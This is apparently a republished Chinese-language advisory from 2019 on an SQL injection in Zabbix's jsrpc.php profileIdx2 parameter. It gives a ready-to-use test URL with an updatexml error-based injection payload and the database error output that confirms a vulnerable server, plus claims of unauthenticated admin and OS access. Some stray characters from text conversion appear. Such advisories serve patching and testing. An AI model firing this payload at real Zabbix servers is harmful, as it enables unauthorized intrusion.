zabbix 爆高危 SQL 注入漏洞，可獲系統權限（profileIdx 2 參數）

時間 2019-12-10

標籤 zabbix sql 注入漏洞可獲系統權限 profileidx 參數欄目 Zabbix 简体版

原文原文鏈接

漏洞概述

zabbix是一個開源的企業級性能監控解決方案。近日，zabbix的jsrpc的profileIdx2參數存在insert方式的SQL注入漏洞，攻擊者無需受權登錄便可登錄zabbix管理系統，也可經過script等功能輕易直接獲取zabbix服務器的操做系統權限。

影響程度

攻擊成本：低

危害程度：高

是否登錄：不須要

影響範圍：2.2.x, 3.0.0-3.0.3。（其餘版本未經測試）

漏洞測試

在zabbix地址後面添加這串urlphp

jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx
2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

若是顯示如下內容，則說明存在profileIdx 2 參數注入漏洞web

<div class="flickerfreescreen" id="flickerfreescreen_1" data-timestamp="1471403798083" style="position: relative;"></div><table class="msgerr" cellpadding="0" cellspacing="0" id="msg_messages" style="width: 100%;"><tr><td class="msg" colspan="1"><ul class="messages"><li class="error">reset() expects parameter 1 to be array, null given [jsrpc.php:208 &rarr; CScreenHistory-&gt;get() &rarr; reset() in /usr/share/zabbix/include/classes/screens/CScreenHistory.php:106]</li><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (230, 2, 'web.item.graph.period', '3600', 2, 1 or updatexml(1,md5(0x11),1) or 1=1)#)] [XPATH syntax error: 'ed733b8d10be225eceba344d533586']</li><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_str, type, idx2) VALUES (231, 2, 'web.item.graph.stime', '20160817050632', 3, 1 or updatexml(1,md5(0x11),1) or 1=1)#)] [XPATH syntax error: 'ed733b8d10be225eceba344d533586']</li><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (232, 2, 'web.item.graph.isnow', '0', 2, 1 or updatexml(1,md5(0x11),1) or 1=1)#)] [XPATH syntax error: 'ed733b8d10be225eceba344d533586']</li></ul></td></tr></table>